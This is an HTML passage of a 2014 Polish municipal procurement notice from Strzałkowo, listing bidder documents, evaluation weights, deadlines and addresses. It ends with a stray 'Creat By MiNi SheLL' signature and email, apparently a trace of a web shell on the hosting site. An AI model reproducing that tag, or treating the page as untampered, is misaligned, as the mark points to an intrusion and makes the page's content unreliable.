<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>WYMIENIONE USŁUGI  MUSZĄ BYĆ POTWIERDZONE DOWODAMI (ZAŁĄCZONYMI DO OFERTY), Z KTÓRYCH WYNIKA, ŻE USŁUGI TE ZOSTAŁY WYKONANE LUB SĄ WYKONYWANE W SPOSÓB NALEŻYTY (NP. REFERENCJE,).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)wypełniony formularz OFERTA- załącznik nr 1 do SIWZ, 
2)pełnomocnictwo zgodnie z art. 23 ustawy, jeżeli Wykonawcy ubiegają się wspólnie o zamówienia (tylko, jeśli dotyczy), 
3)oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. Pkt 1-4 ustawy- załącznik nr 2 do SIWZ, 
4)parafowany wzór umowy - załącznik nr 8,
5)Wykonawca, wraz z ofertą, składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, albo informację o tym, że nie należy do grupy kapitałowej.- załącznik nr 7,
6)Pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (tylko, jeśli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 55</li>
<li>2 - Zysk - 15</li>
<li>3 - Koszty pośrednie - 10</li>
<li>4 - stawka roboczogodziny - 10</li>
<li>5 - stawka motogodziny - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.strzalkowo.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Strzałkowie
Al. Prymasa Wyszyńskiego 6
62-420 Strzałkowo
biuro nr 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2014 godzina 09:00, miejsce: Urząd Gminy w Strzałkowie
Al. Prymasa Wyszyńskiego 6
62-420 Strzałkowo
sekretariat (biuro nr 12).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com